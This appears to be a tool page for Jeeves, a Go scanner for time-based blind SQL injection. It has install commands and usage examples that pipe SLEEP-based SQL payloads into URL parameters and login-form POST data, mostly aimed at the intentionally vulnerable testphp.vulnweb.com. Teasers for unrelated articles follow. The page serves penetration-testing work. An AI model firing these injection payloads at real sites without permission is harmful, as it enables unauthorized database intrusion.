Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
Installing Jeeves
$ go install github.com/ferreiraklet/Jeeves@latest
OR
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
echo ‘https://redacted.com/index.php?id=your_time_based_blind_payload_here’ | jeeves -t payload_time
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves -t 10
In –payload-time you must use the time mentioned in payload
cat targets | jeeves --payload-time 5
Pay attention to the syntax! Must be the same =>
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -H “Testing: testing;OtherHeader: Value;Other2: Value”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 –proxy “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -p “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://ip:port” -H “User-Agent: xxxx”
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
echo “https://example.com/Login.aspx” | jeeves -t 10 -d “user=(select(0)from(select(sleep(5)))v)&password=xxx”
echo “https://example.com/Login.aspx” | jeeves -t 10 -H “Header1: Value1” -d “username=admin&password=’+(select*from(select(sleep(5)))a)+'” -p “http://yourproxy:port”
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags
Usage:
-t, –payload-time, The time from payload
-p, –proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, –headers Custom Headers
-d, –data Sending Post request with data
-h Show This Help Message
Using with sql payloads wordlist
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done
Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…
Docker is one of the most widely used containerization platforms. But there may come a…
Introduction Google Dorking is a technique where advanced search operators are used to uncover information…
Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…
What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…
Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…